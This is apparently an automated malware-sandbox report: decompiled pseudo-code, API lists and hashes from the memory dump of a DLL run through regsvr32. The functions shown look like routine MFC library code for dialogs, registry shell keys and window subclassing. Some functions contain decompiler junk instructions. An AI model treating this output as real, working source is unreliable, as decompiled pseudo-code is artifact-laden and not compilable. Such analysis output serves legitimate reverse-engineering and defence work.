                                                                                                                						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                                                                                                                							E10017C59(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                                					__eflags =  *(_t101 - 0x28) - _t97;
                                                                                                                					if( *(_t101 - 0x28) != _t97) {
                                                                                                                						E10017979(_t84, 1);
                                                                                                                					}
                                                                                                                					__eflags =  *(_t101 - 0x2c) - _t97;
                                                                                                                					if( *(_t101 - 0x2c) != _t97) {
                                                                                                                						EnableWindow( *(_t101 - 0x14), 1);
                                                                                                                					}
                                                                                                                					__eflags =  *(_t101 - 0x14) - _t97;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                                                                                                                						if(__eflags == 0) {
                                                                                                                							SetActiveWindow( *(_t101 - 0x14));
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *_t100 + 0x60))();
                                                                                                                					E1001B96C(_t84, _t100, _t97, _t100, __eflags);
                                                                                                                					__eflags =  *(_t100 + 0x58) - _t97;
                                                                                                                					if( *(_t100 + 0x58) != _t97) {
                                                                                                                						FreeResource( *(_t101 - 0x18));
                                                                                                                					}
                                                                                                                					_t63 =  *(_t100 + 0x44);
                                                                                                                					goto L31;
                                                                                                                				} else {
                                                                                                                					_t63 = _t54 | 0xffffffff;
                                                                                                                					L31:
                                                                                                                					return E10047725(_t63);
                                                                                                                				}
                                                                                                                			}
















                                                                                                                0x1001bf44
                                                                                                                0x1001bf52
                                                                                                                0x1001bf52
                                                                                                                0x1001bf44
                                                                                                                0x1001bf57
                                                                                                                0x1001bf7a
                                                                                                                0x1001bf7d
                                                                                                                0x1001bf83
                                                                                                                0x1001bf83
                                                                                                                0x1001bf88
                                                                                                                0x1001bf8b
                                                                                                                0x1001bf92
                                                                                                                0x1001bf92
                                                                                                                0x1001bf98
                                                                                                                0x1001bf9b
                                                                                                                0x1001bfa3
                                                                                                                0x1001bfa6
                                                                                                                0x1001bfab
                                                                                                                0x1001bfab
                                                                                                                0x1001bfa6
                                                                                                                0x1001bfb5
                                                                                                                0x1001bfba
                                                                                                                0x1001bfbf
                                                                                                                0x1001bfc2
                                                                                                                0x1001bfc7
                                                                                                                0x1001bfc7
                                                                                                                0x1001bfcd
                                                                                                                0x00000000
                                                                                                                0x1001be74
                                                                                                                0x1001be74
                                                                                                                0x1001bfd0
                                                                                                                0x1001bfd5
                                                                                                                0x1001bfd5

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1001BE1A
                                                                                                                • FindResourceA.KERNEL32 ref: 1001BE4D
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1001BE55
                                                                                                                • LockResource.KERNEL32(?,00000024,10002FE0,0000035C), ref: 1001BE66
                                                                                                                • GetDesktopWindow.USER32 ref: 1001BE99
                                                                                                                • IsWindowEnabled.USER32(?), ref: 1001BEA7
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 1001BEB6
                                                                                                                  • Part of subcall function 1001795E: IsWindowEnabled.USER32(?), ref: 10017967
                                                                                                                  • Part of subcall function 10017979: EnableWindow.USER32(?,?), ref: 10017986
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1001BF92
                                                                                                                • GetActiveWindow.USER32 ref: 1001BF9D
                                                                                                                • SetActiveWindow.USER32(?), ref: 1001BFAB
                                                                                                                • FreeResource.KERNEL32(?,?,00000024,10002FE0,0000035C), ref: 1001BFC7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1509511306-0
                                                                                                                • Opcode ID: d34204b40df7c202cc3224c9b72ec68b61058b99a552d90991c186c7926b9ed6
                                                                                                                • Instruction ID: 396292340296106368fb6444aaf32842fcf05ff203fa84e718e3a48a4a1359f2
                                                                                                                • Opcode Fuzzy Hash: d34204b40df7c202cc3224c9b72ec68b61058b99a552d90991c186c7926b9ed6
                                                                                                                • Instruction Fuzzy Hash: AB518B34A00B05CBDB11DFA5CD896AEBBF1FF48742F11006DE642AA2A1CB75D982CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1001AA97(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                                                				signed int _v4;
                                                                                                                				char _v8;
                                                                                                                				char _v16;
                                                                                                                				char _v20;
                                                                                                                				char* _v24;
                                                                                                                				char _v28;
                                                                                                                				char _v32;
                                                                                                                				char _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				long _v44;
                                                                                                                				char _t90;
                                                                                                                				intOrPtr _t103;
                                                                                                                				char _t107;
                                                                                                                				char* _t135;
                                                                                                                				intOrPtr _t154;
                                                                                                                				char* _t157;
                                                                                                                				intOrPtr _t159;
                                                                                                                				intOrPtr _t190;
                                                                                                                				intOrPtr* _t193;
                                                                                                                				long _t194;
                                                                                                                				intOrPtr _t196;
                                                                                                                				intOrPtr _t197;
                                                                                                                				char* _t198;
                                                                                                                				void* _t199;
                                                                                                                				void* _t201;
                                                                                                                				void* _t202;
                                                                                                                
                                                                                                                				_t191 = __edx;
                                                                                                                				_t159 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                                				if(_t159 != 0) {
                                                                                                                					_push(0x20);
                                                                                                                					E1004764D(0x1008fcc5, __ebx, __edi, __esi);
                                                                                                                					_t196 = _t159;
                                                                                                                					L1000140B( &_v36, E100184C0());
                                                                                                                					_v4 = _v4 & 0x00000000;
                                                                                                                					L1000140B( &_v16, E100184C0());
                                                                                                                					_v4 = 1;
                                                                                                                					E10029AB3(__ebx, __edx,  *((intOrPtr*)(E1001E302(__ebx, __edi, _t196, __eflags) + 8)),  &_v36);
                                                                                                                					_t90 =  *((intOrPtr*)(_t196 + 8));
                                                                                                                					__eflags = _t90;
                                                                                                                					_v32 = _t90;
                                                                                                                					if(_t90 != 0) {
                                                                                                                						_t197 = _t196 + 4;
                                                                                                                						__eflags = _t197;
                                                                                                                						_v40 = _t197;
                                                                                                                						_t157 = "%s\\shell\\printto\\%s";
                                                                                                                						_t198 = "command";
                                                                                                                						do {
                                                                                                                							_t193 =  *((intOrPtr*)(E10012115( &_v32)));
                                                                                                                							L1000140B( &_v24, E100184C0());
                                                                                                                							_v4 = 2;
                                                                                                                							L1000140B( &_v20, E100184C0());
                                                                                                                							_v4 = 3;
                                                                                                                							L1000140B( &_v28, E100184C0());
                                                                                                                							_v4 = 4;
                                                                                                                							_t103 =  *((intOrPtr*)( *_t193 + 0x64))( &_v20, 5);
                                                                                                                							__eflags = _t103;
                                                                                                                							if(_t103 != 0) {
                                                                                                                								_t107 = _v20;
                                                                                                                								__eflags =  *((intOrPtr*)(_t107 - 0xc));
                                                                                                                								if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
                                                                                                                									__eflags =  *((intOrPtr*)( *_t193 + 0x64))( &_v28, 6);
                                                                                                                									if(__eflags == 0) {
                                                                                                                										E10018A1F(_t157,  &_v28, _t199,  &_v20);
                                                                                                                									}
                                                                                                                									L1000106E( &_v16, "%s\\DefaultIcon", _v20);
                                                                                                                									_t202 = _t201 + 0xc;
                                                                                                                									E10027605(_t191, __eflags, _v16);
                                                                                                                									__eflags =  *((intOrPtr*)( *_t193 + 0x64))( &_v16, 0);
                                                                                                                									if(__eflags == 0) {
                                                                                                                										L14:
                                                                                                                										_push("ddeexec");
                                                                                                                										L1000106E( &_v16, "%s\\shell\\open\\%s", _v20);
                                                                                                                										E10027605(_t191, __eflags, _v16);
                                                                                                                										_push("ddeexec");
                                                                                                                										L1000106E( &_v16, "%s\\shell\\print\\%s", _v20);
                                                                                                                										E10027605(_t191, __eflags, _v16);
                                                                                                                										_push("ddeexec");
                                                                                                                										L1000106E( &_v16, _t157, _v20);
                                                                                                                										_t202 = _t202 + 0x30;
                                                                                                                										E10027605(_t191, __eflags, _v16);
                                                                                                                									} else {
                                                                                                                										__eflags =  *((intOrPtr*)(_v16 - 0xc));
                                                                                                                										if(__eflags == 0) {
                                                                                                                											goto L14;
                                                                                                                										}
                                                                                                                									}
                                                                                                                									L1000106E( &_v16, "%s\\shell\\open\\%s", _v20);
                                                                                                                									E10027605(_t191, __eflags, _v16);
                                                                                                                									L1000106E( &_v16, "%s\\shell\\print\\%s", _v20);
                                                                                                                									E10027605(_t191, __eflags, _v16);
                                                                                                                									L1000106E( &_v16, _t157, _v20);
                                                                                                                									_t201 = _t202 + 0x30;
                                                                                                                									E10027605(_t191, __eflags, _v16);
                                                                                                                									 *((intOrPtr*)( *_t193 + 0x64))( &_v24, 4, _t198, _t198, _t198);
                                                                                                                									_t135 = _v24;
                                                                                                                									__eflags =  *((intOrPtr*)(_t135 - 0xc));
                                                                                                                									if( *((intOrPtr*)(_t135 - 0xc)) != 0) {
                                                                                                                										_v44 = 0x208;
                                                                                                                										_t194 = RegQueryValueA(0x80000000, _v24, L100011F4( &_v16, 0x208),  &_v44);
                                                                                                                										E1000FED3( &_v16, 0xffffffff);
                                                                                                                										__eflags = _t194;
                                                                                                                										if(__eflags != 0) {
                                                                                                                											L19:
                                                                                                                											L1000106E( &_v16, "%s\\ShellNew", _v24);
                                                                                                                											_t201 = _t201 + 0xc;
                                                                                                                											E10027605(_t191, __eflags, _v16);
                                                                                                                											E10027605(_t191, __eflags, _v24);
                                                                                                                										} else {
                                                                                                                											__eflags =  *((intOrPtr*)(_v16 - 0xc)) - _t194;
                                                                                                                											if(__eflags == 0) {
                                                                                                                												goto L19;
                                                                                                                											} else {
                                                                                                                												__eflags = E1001BBE2(_t157,  &_v16, _t191, _t194, _t198, _t199, _v20);
                                                                                                                												if(__eflags == 0) {
                                                                                                                													goto L19;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							L100013E3(_v28 + 0xfffffff0, _t191);
                                                                                                                							L100013E3(_v20 + 0xfffffff0, _t191);
                                                                                                                							_v4 = 1;
                                                                                                                							L100013E3( &(_v24[0xfffffffffffffff0]), _t191);
                                                                                                                							__eflags = _v32;
                                                                                                                						} while (_v32 != 0);
                                                                                                                					}
                                                                                                                					L100013E3(_v16 + 0xfffffff0, _t191);
                                                                                                                					__eflags = _v36 + 0xfffffff0;
                                                                                                                					return E10047725(L100013E3(_v36 + 0xfffffff0, _t191));
                                                                                                                				} else {
                                                                                                                					_push(_t199);
                                                                                                                					_push(_t159);
                                                                                                                					_v8 = 0x100b8618;
                                                                                                                					L10048E48( &_v8, 0x100aff30);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1004764D(0x1008dd26, __ebx, __edi, __esi);
                                                                                                                					_t190 = E10020454(0x104);
                                                                                                                					_v20 = _t190;
                                                                                                                					_t154 = 0;
                                                                                                                					_v8 = 0;
                                                                                                                					if(_t190 != 0) {
                                                                                                                						_t154 = E1001DB72(_t190);
                                                                                                                					}
                                                                                                                					return E10047725(_t154);
                                                                                                                				}
                                                                                                                			}






























                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: %s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$command$ddeexec
                                                                                                                • API String ID: 431132790-556638191
                                                                                                                • Opcode ID: 376e346b3a938ab882f94d3ede848e6f5f87ce7a4678c1daf7e28a5ccc18b777
                                                                                                                • Instruction ID: a883703464cde51ad283cf1ffd4eee1045023c49d791b7e8cf4ffdc85c46f849
                                                                                                                • Opcode Fuzzy Hash: 376e346b3a938ab882f94d3ede848e6f5f87ce7a4678c1daf7e28a5ccc18b777
                                                                                                                • Instruction Fuzzy Hash: F581587490011AABDF01EBA4CC86EFEB7B9FF04344F500118F119B7192EB31AA51CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10015EF7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				_Unknown_base(*)()* _t31;
                                                                                                                				void* _t33;
                                                                                                                				void* _t34;
                                                                                                                				void* _t40;
                                                                                                                				void* _t43;
                                                                                                                				void* _t60;
                                                                                                                				void* _t64;
                                                                                                                				struct HWND__* _t66;
                                                                                                                				CHAR* _t68;
                                                                                                                				void* _t71;
                                                                                                                
                                                                                                                				_t64 = __edx;
                                                                                                                				_t60 = __ecx;
                                                                                                                				_push(0x40);
                                                                                                                				E10047680(0x1008ea63, __ebx, __edi, __esi);
                                                                                                                				_t66 =  *(_t71 + 8);
                                                                                                                				_t68 = "AfxOldWndProc423";
                                                                                                                				_t31 = GetPropA(_t66, _t68);
                                                                                                                				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
                                                                                                                				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                                                                				 *(_t71 - 0x18) = _t31;
                                                                                                                				_t58 = 1;
                                                                                                                				_t33 =  *(_t71 + 0xc) - 6;
                                                                                                                				if(_t33 == 0) {
                                                                                                                					_t34 = E10013FEA(1, _t60, _t71,  *(_t71 + 0x14));
                                                                                                                					E10015E0B(_t60, E10013FEA(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
                                                                                                                					goto L9;
                                                                                                                				} else {
                                                                                                                					_t40 = _t33 - 0x1a;
                                                                                                                					if(_t40 == 0) {
                                                                                                                						_t58 = 0 | E10015E81(1, _t66, E10013FEA(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
                                                                                                                						L9:
                                                                                                                						if(_t58 != 0) {
                                                                                                                							goto L10;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t43 = _t40 - 0x62;
                                                                                                                						if(_t43 == 0) {
                                                                                                                							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
                                                                                                                							RemovePropA(_t66, _t68);
                                                                                                                							GlobalDeleteAtom(GlobalFindAtomA(_t68));
                                                                                                                							goto L10;
                                                                                                                						} else {
                                                                                                                							if(_t43 != 0x8e) {
                                                                                                                								L10:
                                                                                                                								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                                							} else {
                                                                                                                								E10012935(E10013FEA(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
                                                                                                                								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                                								E1001485E(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E10047725( *(_t71 - 0x14));
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 10015EFE
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 10015F0D
                                                                                                                • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 10015F67
                                                                                                                  • Part of subcall function 1001485E: GetWindowRect.USER32 ref: 10014886
                                                                                                                  • Part of subcall function 1001485E: GetWindow.USER32(?,00000004), ref: 100148A3
                                                                                                                • SetWindowLongA.USER32 ref: 10015F8E
                                                                                                                • RemovePropA.USER32(?,AfxOldWndProc423), ref: 10015F96
                                                                                                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 10015F9D
                                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 10015FA4
                                                                                                                  • Part of subcall function 10012935: GetWindowRect.USER32 ref: 10012941
                                                                                                                • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 10015FF8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                • String ID: AfxOldWndProc423
                                                                                                                • API String ID: 2702501687-1060338832
                                                                                                                • Opcode ID: 424c9e9bce70c90c35348e3e81b1569fcdc2e45d665c4bac450301485fc4696e
                                                                                                                • Instruction ID: febc920c58330b31607bc6e03b2d61de395114b009de471acd785bc6be4fc9a9
                                                                                                                • Opcode Fuzzy Hash: 424c9e9bce70c90c35348e3e81b1569fcdc2e45d665c4bac450301485fc4696e
                                                                                                                • Instruction Fuzzy Hash: 7031413680011AEBDF01DFA0CD8ADEF7AB8FF49351F054528F601AA0A1D736D952DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 61%
                                                                                                                			E100296A0(void* __ebx, signed int __edi, void* __esi, void* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v3;
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				int _v16;
                                                                                                                				char* _v20;
                                                                                                                				int _v24;
                                                                                                                				intOrPtr _v117;
                                                                                                                				signed int _t38;
                                                                                                                				signed int _t46;
                                                                                                                				int* _t51;
                                                                                                                
                                                                                                                				asm("fisttp dword [ecx]");
                                                                                                                				asm("adc [ebx-0x167cefb7], cl");
                                                                                                                				asm("adc cl, ch");
                                                                                                                				_t46 = __edi ^ _v3;
                                                                                                                				_v117();
                                                                                                                				_push(_t46);
                                                                                                                				_t51 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_v20 = L100011F4(_a8, 0x104);
                                                                                                                				_v16 = 0x104;
                                                                                                                				_v24 = 0;
                                                                                                                				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
                                                                                                                					_v8 = 0;
                                                                                                                					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                                                                                                                						_a4 = 0;
                                                                                                                						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
                                                                                                                							_t38 = RegQueryValueExA(_a4, 0x1009c448, 0,  &_v24, _v20,  &_v16);
                                                                                                                							asm("sbb esi, esi");
                                                                                                                							_t51 =  ~_t38 + 1;
                                                                                                                							RegCloseKey(_a4);
                                                                                                                						}
                                                                                                                						RegCloseKey(_v8);
                                                                                                                					}
                                                                                                                					RegCloseKey(_v12);
                                                                                                                				}
                                                                                                                				E1000FED3(_a8, 0xffffffff);
                                                                                                                				return _t51;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 100296E8
                                                                                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 100296FC
                                                                                                                • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 10029717
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 10029731
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10029741
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10029746
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 1002974B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$QueryValue
                                                                                                                • String ID: CLSID$InProcServer32
                                                                                                                • API String ID: 3523390698-323508013
                                                                                                                • Opcode ID: 3578df34caa4d2e3dfa6c351421b129961d0aa4c243a6a38072af882a56ef9e0
                                                                                                                • Instruction ID: f2a30076464bdd38d6fdb78a992d83e2900a030fe08d717353393a64dc1c7679
                                                                                                                • Opcode Fuzzy Hash: 3578df34caa4d2e3dfa6c351421b129961d0aa4c243a6a38072af882a56ef9e0
                                                                                                                • Instruction Fuzzy Hash: 9A212772900169BFDF01EFA9CD80CEEBFB9EF456A4F1041A6F909A6120D7319B41DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E100296B0(void* __ebx, void* _a4, intOrPtr _a8) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				int _v16;
                                                                                                                				char* _v20;
                                                                                                                				int _v24;
                                                                                                                				signed int _t35;
                                                                                                                				int* _t44;
                                                                                                                
                                                                                                                				_t44 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_v20 = L100011F4(_a8, 0x104);
                                                                                                                				_v16 = 0x104;
                                                                                                                				_v24 = 0;
                                                                                                                				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
                                                                                                                					_v8 = 0;
                                                                                                                					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                                                                                                                						_a4 = 0;
                                                                                                                						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
                                                                                                                							_t35 = RegQueryValueExA(_a4, 0x1009c448, 0,  &_v24, _v20,  &_v16);
                                                                                                                							asm("sbb esi, esi");
                                                                                                                							_t44 =  ~_t35 + 1;
                                                                                                                							RegCloseKey(_a4);
                                                                                                                						}
                                                                                                                						RegCloseKey(_v8);
                                                                                                                					}
                                                                                                                					RegCloseKey(_v12);
                                                                                                                				}
                                                                                                                				E1000FED3(_a8, 0xffffffff);
                                                                                                                				return _t44;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 100296E8
                                                                                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 100296FC
                                                                                                                • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 10029717
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 10029731
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10029741
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10029746
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 1002974B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen$QueryValue
                                                                                                                • String ID: CLSID$InProcServer32
                                                                                                                • API String ID: 3523390698-323508013
                                                                                                                • Opcode ID: 81f69cb689f6843a058716a6a0feb26e352c496ef2f3606f2c0e3d5cf5593caa
                                                                                                                • Instruction ID: 31e1e874dfacf024a2a9f9362d9fa2cdaf9cb0843e2b98def9e3b85b75eacc03
                                                                                                                • Opcode Fuzzy Hash: 81f69cb689f6843a058716a6a0feb26e352c496ef2f3606f2c0e3d5cf5593caa
                                                                                                                • Instruction Fuzzy Hash: 421137B690012DBBDF01EF99CD80CEEBFB9EF456A4F104166F919A6120D7319B41DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003DBEC() {
                                                                                                                				struct HWND__* _v4;
                                                                                                                				void* _v68;
                                                                                                                				void* _v76;
                                                                                                                				int _t4;
                                                                                                                				int _t10;
                                                                                                                				struct HDC__* _t15;
                                                                                                                				void* _t18;
                                                                                                                
                                                                                                                				_t4 =  *0x100b9b14; // 0xffffffff
                                                                                                                				if(_t4 == 0xffffffff) {
                                                                                                                					_t15 = GetDC(0);
                                                                                                                					_v4 = 0;
                                                                                                                					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                                                                                                                					if(_t18 != 0) {
                                                                                                                						_v68 = SelectObject(_t15, _t18);
                                                                                                                					}
                                                                                                                					GetCharWidthA(_t15, 0x36, 0x36, 0x100b9b14);
                                                                                                                					if(_t18 != 0) {
                                                                                                                						SelectObject(_t15, _v76);
                                                                                                                						DeleteObject(_t18);
                                                                                                                					}
                                                                                                                					ReleaseDC(0, _t15);
                                                                                                                					_t10 =  *0x100b9b14; // 0xffffffff
                                                                                                                					return _t10;
                                                                                                                				}
                                                                                                                				return _t4;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 1003DBFE
                                                                                                                • GetSystemMetrics.USER32 ref: 1003DC22
                                                                                                                • CreateFontA.GDI32(00000000,?,?,?,?,?,1003F0E1,00001000,?,?,?,?,?,?), ref: 1003DC29
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1003DC3D
                                                                                                                • GetCharWidthA.GDI32(00000000,00000036,00000036,100B9B14), ref: 1003DC4D
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1003DC5C
                                                                                                                • DeleteObject.GDI32(00000000), ref: 1003DC5F
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1003DC67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                                • String ID: Marlett
                                                                                                                • API String ID: 1397664628-3688754224
                                                                                                                • Opcode ID: f143f9938d41884723be5508dee54b535352d4842ea16944978db2463053da02
